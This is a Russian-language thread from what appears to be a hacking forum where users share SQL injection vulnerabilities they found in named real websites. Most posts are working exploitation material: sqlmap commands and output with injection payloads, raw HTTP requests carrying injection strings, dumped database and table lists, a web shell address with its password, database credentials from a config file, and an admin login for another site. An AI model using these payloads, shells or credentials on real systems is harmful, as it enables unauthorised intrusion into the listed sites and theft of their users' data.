• XSS.stack #1 – первый литературный журнал от юзеров форума

Найденные интересеные SQL inj & XSS

Пожалуйста, обратите внимание, что пользователь заблокирован
Поделюсь и я:
Код:
http://brodim.com/
web application technology: OpenResty
back-end DBMS: MySQL 5 (Percona fork)
parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=' UNION ALL SELECT CONCAT(CONCAT('qbpbq','eWMjYjKHOsohdtQcgSPLidZuuoDMdNGdaKhdvKVN'),'qzqpq'),NULL,NULL-- rmpl
available databases [2]:                                                                                                                                                                                                                  
[*] brodim
[*] information_schema
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
POST /webbots/btcPaymentStatusAjax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://apps1store.com/
Cookie: PHPSESSID=c904e4d0d7539116679cc30d6b107e0c;__tawkuuid=e::apps1store.com::2934SySEOkRyg5KwgL4sK+vgESdzKyaESIahpIwtpsHgm1CMAKrB22kqIXfmT4/Z::2;TawkConnectionTime=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host: apps1store.com
Connection: Keep-alive

address=-1'%20OR%203*2*1=6%20AND%20000553=000553%20--%20&email=sample%40email.tst&software=YouBotTub
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
POST /webbots/btcPaymentStatusAjax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://apps1store.com/
Cookie: PHPSESSID=c904e4d0d7539116679cc30d6b107e0c;__tawkuuid=e::apps1store.com::2934SySEOkRyg5KwgL4sK+vgESdzKyaESIahpIwtpsHgm1CMAKrB22kqIXfmT4/Z::2;TawkConnectionTime=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host: apps1store.com
Connection: Keep-alive

address=-1'%20OR%203*2*1=6%20AND%20000553=000553%20--%20&email=sample%40email.tst&software=YouBotTub
1619793185208.png

глянем что там есть)
1619793279521.png

пароли печаль
 
Код:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: https://123chef.es:443/vajilla-desechable/-7557' OR MAKE_SET(1846=1846,6124) AND 'MICJ'='MICJ


    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: https://123chef.es:443/vajilla-desechable/' AND GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(7065=7065,1))),0x717a7a7071),7065) AND 'YnhS'='YnhS


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://123chef.es:443/vajilla-desechable/' AND (SELECT 7541 FROM (SELECT(SLEEP(5)))oFQI) AND 'DKtt'='DKtt


available databases [2]:
[*] c123chef_pres844
[*] information_schema
 
Код:
шоп на opencart оплата ба,так же весит джоб сайт,скуля:
sqlmap -u "https://gunaccessories.eu/?route=product/product&path=4_16&product_id=431*" --sql-shell --dbms="MySQL" --drop-set-cookie
шелл:
https://gunaccessories.eu/admin/controller/extension/extension/pasya.php:P@55w()rD

//pma
https://185.72.86.33/pma/
jobsnavigator.eu
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'jobsnavi_gunacce');
define('DB_PASSWORD', 'mainPassword');
define('DB_DATABASE', 'jobsnavi_gunacces_maindb');
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Скажите пожалуйста, направьте, есть ли ещё такие сайты/топики/блоги
где выкладывают найденные sql/xss уязвимости.
я новичок и мне важно тренироватся
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
"http://factjo.com/news.aspx/news.aspx?Id=-1;%20waitfor%20delay%20'0:0:6'%20--%20"
Parameter: Id (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
    Payload: Id=-2778 OR 5321 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5321=5321) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (random number) - 10 columns
    Payload: Id=-1073 UNION ALL SELECT 5693,5693,5693,5693,5693,5693,5693,5693,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(90)+CHAR(102)+CHAR(118)+CHAR(118)+CHAR(111)+CHAR(77)+CHAR(66)+CHAR(66)+CHAR(85)+CHAR(68)+CHAR(110)+CHAR(85)+CHAR(75)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(119)+CHAR(99)+CHAR(107)+CHAR(79)+CHAR(73)+CHAR(101)+CHAR(116)+CHAR(85)+CHAR(117)+CHAR(115)+CHAR(66)+CHAR(90)+CHAR(122)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(104)+CHAR(112)+CHAR(82)+CHAR(112)+CHAR(100)+CHAR(82)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113),5693-- QieU

available databases [9]:
[*] factDB2016
[*] factNewsite
[*] FactoldDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
sqlmap.py -u "https://www.internacionalshopping.com/lojas/grava-destino.asp?destino=1065"

Parameter: destino (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: destino=1065' AND 8705=8705 AND 'TZKQ'='TZKQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: destino=1065' AND GTID_SUBSET(CONCAT(0x7162717a71,(SELECT (ELT(2855=2855,1))),0x71706a7671),2855) AND 'cdDB'='cdDB

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: destino=1065' OR SLEEP(5) AND 'NagB'='NagB
---
[13:53:20] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:53:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[13:53:29] [INFO] fetching database names
[13:53:32] [INFO] retrieved: 'information_schema'
[13:53:33] [INFO] retrieved: 'site_internacionalshopping'
available databases [2]:
[*] information_schema
[*] site_internacionalshopping
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Друзья, поделитесь уязвимостями
POST /api/shrink.php HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: 1ink.cc
Cookie: PHPSESSID=1a7i2fncurk3kdp93mdknb16j5
Host: www.1ink.cc
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

showads=0&uid=1&url=e
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
POST /index.php?route=user/user/register HTTP/1.1
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: gecobitexchange.com
Cookie: PHPSESSID=fim62vuqm0rp5t2bpun89qtp60
Host: gecobitexchange.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ck_termini=on&code_affiliato=94102&email=-1'%20OR%203*2*1%3d6%20AND%20000805%3d000805%20--%20&password=g00dPa%24%24w0rD&rpassword=g00dPa%24%24w0rD
 
Пожалуйста, обратите внимание, что пользователь заблокирован

Parameter: u (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: coin=XMR&u=1' OR NOT 4674=4674-- CVqH

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: coin=XMR&u=1' OR (SELECT 2992 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(2992=2992,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MYNJ

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: coin=XMR&u=1' AND (SELECT 7231 FROM (SELECT(SLEEP(5)))YTdn)-- ySYu

Type: UNION query
Title: Generic UNION query (NULL) - 24 columns
Payload: coin=XMR&u=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x61704959586e45505753454c66664c7069436b415a45466159546c49556c77686b67546d4945746e,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[16:14:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 7.2.34
back-end DBMS: MySQL >= 5.0
[16:14:41] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mychatbo_1hrdoge
[*] mychatbo_crypto




Database: mychatbo_crypto
[310 tables]
+----------------------------+
| DOGEABL_Log |
| DOGEAddress_Locks |
| DOGEAddresses |
| DOGEClaimlog |
| DOGEIP_Locks |
| DOGEIPs |
| DOGENH_Log |
| DOGEPages |
| DOGEProxyCheck |
| DOGERefs |
| DOGESessions_Log |
| DOGESettings |
| DOGEShortlinks |
| 1hrdogefaucetABL_Log |
| 1hrdogefaucetAddress_Locks |
| 1hrdogefaucetAddresses |
| 1hrdogefaucetClaimlog |
| 1hrdogefaucetIP_Locks |
| 1hrdogefaucetIPs |
| 1hrdogefaucetNH_Log |
| 1hrdogefaucetPages |
| 1hrdogefaucetProxyCheck |
| 1hrdogefaucetRefs |
| 1hrdogefaucetSessions_Log |
| 1hrdogefaucetSettings |
| 1hrdogefaucetShortlinks |
| cycle |
| session |
| user |
| a_tr |
| ad_clicks |
| ads |
| ads_clicked |
| ads_surfed |
| advertise |
| after_login |
| autoresponder_config |
| autoresponders |
| awABL_Log |
| awAddress_Locks |
| awAddresses |
| awClaimlog |
| awIP_Locks |
| awIPs |
| awNH_Log |
| awPages |
| awProxyCheck |
| awRefs |
| awSessions_Log |
| awSettings |
| awShortlinks |
| ban |
| ban_clicks |
| ban_rules |
| banner_codes |
| banner_exchange |
| banner_exchange_2 |
| banner_exchange_3 |
| bonus_history |
| bonus_house |
| btc_history |
| buybuttons |
| cash_ads |
| cash_ads_clicked |
| chat_guest |
| chat_list |
| chatta |
| chatta_settings |
| chfaucetABL_Log |
| chfaucetAddress_Locks |
| chfaucetAddresses |
| chfaucetClaimlog |
| chfaucetIP_Locks |
| chfaucetIPs |
| chfaucetNH_Log |
| chfaucetPages |
| chfaucetProxyCheck |
| chfaucetRefs |
| chfaucetSessions_Log |
| chfaucetSettings |
| chfaucetShortlinks |
| codes_125x125 |
| codes_125x125_ow |
| codes_160x600 |
| codes_160x600_ow |
| codes_200x200 |
| codes_200x200_ow |
| codes_300x250 |
| codes_300x250_ow |
| codes_468x60 |
| codes_468x60_ow |
| codes_728x90 |
| codes_768x90 |
| codes_768x90_ow |
| comments |
| countries |
| currencies |
| cycle_stats |
| dl_builder |
| doge_history |
| downloadprotect |
| ecdogeABL_Log |
| ecdogeAddress_Locks |
| ecdogeAddresses |
| ecdogeClaimlog |
| ecdogeIP_Locks |
| ecdogeIPs |
| ecdogeNH_Log |
| ecdogePages |
| ecdogeProxyCheck |
| ecdogeRefs |
| ecdogeSessions_Log |
| ecdogeSettings |
| ecdogeShortlinks |
| ecfaucetABL_Log |
| ecfaucetAddress_Locks |
| ecfaucetAddresses |
| ecfaucetClaimlog |
| ecfaucetIP_Locks |
| ecfaucetIPs |
| ecfaucetNH_Log |
| ecfaucetPages |
| ecfaucetProxyCheck |
| ecfaucetRefs |
| ecfaucetSessions_Log |
| ecfaucetSettings |
| ecfaucetShortlinks |
| faq |
| faucet_in_from |
| filters |
| fpfaucetABL_Log |
| fpfaucetAddress_Locks |
| fpfaucetAddresses |
| fpfaucetClaimlog |
| fpfaucetIP_Locks |
| fpfaucetIPs |
| fpfaucetNH_Log |
| fpfaucetPages |
| fpfaucetProxyCheck |
| fpfaucetRefs |
| fpfaucetSessions_Log |
| fpfaucetSettings |
| fpfaucetShortlinks |
| guest_members |
| hit_clicks |
| hits |
| home_in_from |
| jackpot_house |
| jp_history |
| last_cc_digits |
| levels |
| list_in_from |
| mban |
| mban_clicks |
| member_block |
| member_journal |
| member_notes |
| members |
| members_chatta |
| members_chatta_settings |
| members_in_from |
| membership |
| memnews |
| menu_permissions |
| menus |
| messages |
| mwfaucetABL_Log |
| mwfaucetAddress_Locks |
| mwfaucetAddresses |
| mwfaucetClaimlog |
| mwfaucetIP_Locks |
| mwfaucetIPs |
| mwfaucetNH_Log |
| mwfaucetPages |
| mwfaucetProxyCheck |
| mwfaucetRefs |
| mwfaucetSessions_Log |
| mwfaucetSettings |
| mwfaucetShortlinks |
| my_community |
| ne_ads_clicked |
| ne_ads_surfed |
| netbuild |
| network |
| network_exchange |
| news |
| news2 |
| news3 |
| news4 |
| news_index |
| page_codes |
| payment_log |
| paypal_log |
| pending |
| pma__bookmark |
| pma__central_columns |
| pma__column_info |
| pma__designer_settings |
| pma__export_templates |
| pma__favorite |
| pma__history |
| pma__navigationhiding |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__savedsearches |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
| pma__usergroups |
| pma__users |
| post_ignore |
| prize_bar_hits |
| products |
| promo_tools |
| ql_ads |
| ql_ads_clicked |
| ql_ads_surfed |
| ql_in_from |
| ql_online |
| ql_transactions |
| qlwallets |
| race_details |
| race_stats |
| radioearn_api |
| radioearn_settings |
| settings |
| settings_2 |
| signup_settings |
| site |
| site_clicks |
| solo |
| solos |
| solos_clicked |
| splash_in_from |
| splash_personal |
| surf_ads |
| surf_ads_clicked |
| surf_ads_surfed |
| surf_exchange |
| surf_report |
| surf_users_daily |
| surf_users_online |
| tags |
| tb_buyref |
| tb_clicks |
| tb_config |
| tb_contact |
| tb_history |
| tb_messenger |
| tb_payme |
| tb_upgrade |
| tb_users |
| tb_users_deleted |
| temp |
| temp_cc |
| templates |
| text |
| text_clicks |
| text_codes_125x125 |
| text_codes_200 |
| text_codes_200x20 |
| text_exchange_ad |
| text_link_exchange |
| top_surfers_daily |
| transactions |
| twitter |
| unique_online |
| unique_online_myc |
| unique_view4 |
| users_af_ks_btc |
| users_af_ks_dgb |
| users_af_ks_eos |
| users_day_1 |
| users_day_10 |
| users_day_11 |
| users_day_12 |
| users_day_13 |
| users_day_14 |
| users_day_15 |
| users_day_16 |
| users_day_17 |
| users_day_18 |
| users_day_19 |
| users_day_2 |
| users_day_20 |
| users_day_21 |
| users_day_22 |
| users_day_23 |
| users_day_24 |
| users_day_25 |
| users_day_26 |
| users_day_27 |
| users_day_28 |
| users_day_29 |
| users_day_3 |
| users_day_30 |
| users_day_31 |
| users_day_4 |
| users_day_5 |
| users_day_6 |
| users_day_7 |
| users_day_8 |
| users_day_9 |
| users_online |
| video_codes |
| view4_sites |
| wallets |
+----------------------------+
 
Пожалуйста, обратите внимание, что пользователь заблокирован

---
Parameter: category (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: category=-4045' OR 9329=9329-- iBnQ&link=category-list&topic=18

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=228' AND (SELECT 2203 FROM (SELECT(SLEEP(5)))edGW)-- ibyt&link=category-list&topic=18

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: category=228' UNION ALL SELECT NULL,NULL,CONCAT(0x7170786b71,0x6e46784b56674a547057575a785275716e4d444f6961725353777558425575526f47567253794453,0x71766b7871)-- -&link=category-list&topic=18
---
[21:10:38] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:10:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[21:10:44] [INFO] fetching database names
available databases [8]:
[*] google
[*] information_schema
[*] location_db
[*] mysql
[*] network
[*] performance_schema
[*] phpmyadmin
[*] sys
 
Пожалуйста, обратите внимание, что пользователь заблокирован

POST /auth/ HTTP/1.1
Host: tron-faucet.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 212
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=c824aaa1d33be2f91eb99d6361ae8f59
Referer: https://tron-faucet.biz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

user=1&pass=1


Parameter: pass (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1&pass=1' AND (SELECT 5756 FROM (SELECT(SLEEP(5)))VATp)-- yPou
---
[19:32:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:32:46] [INFO] testing MySQL
[19:32:49] [WARNING] reflective value(s) found and filtering out
[19:32:49] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails
[19:32:49] [INFO] confirming MySQL
[19:32:49] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0 (Percona fork)
[19:32:49] [INFO] fetching database names
[19:32:49] [INFO] fetching number of databases
[19:32:49] [INFO] resumed: 2
[19:32:49] [INFO] resumed: information_schema
[19:32:49] [INFO] resumed: host1823388_trx
available databases [2]:
[*] host1823388_trx
[*] information_schema
 
Пожалуйста, обратите внимание, что пользователь заблокирован
не мое,попало мне просто такое.не пинать там линков всем хватит.там я так понял письками
Впорос от зеленого . Вы их массово шоданите ? Или какие-то списки скульмапом сканите?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
http://leverageminners.com/ admin: Marvel pass:Brokerboy234 сайт скам

POST /action/login.php HTTP/1.1
Host: leverageminners.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Cookie: loggedin=May%2030th%20-%206%3A06%20pm; PHPSESSID=e7abb829e55c8dff4f0ab4879faa2699; _ga=GA1.2.1087658785.1622397623; _gid=GA1.2.2010592923.1622397623; intercom-id-vb1l0h05=174cb86c-eb82-4886-9bea-17961e1ae7f3; intercom-session-vb1l0h05=
Referer: http://leverageminners.com/action/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

balance=0.00&bid=13.09&tradeamount=3&id=143&email=1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

1624086616891.png
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх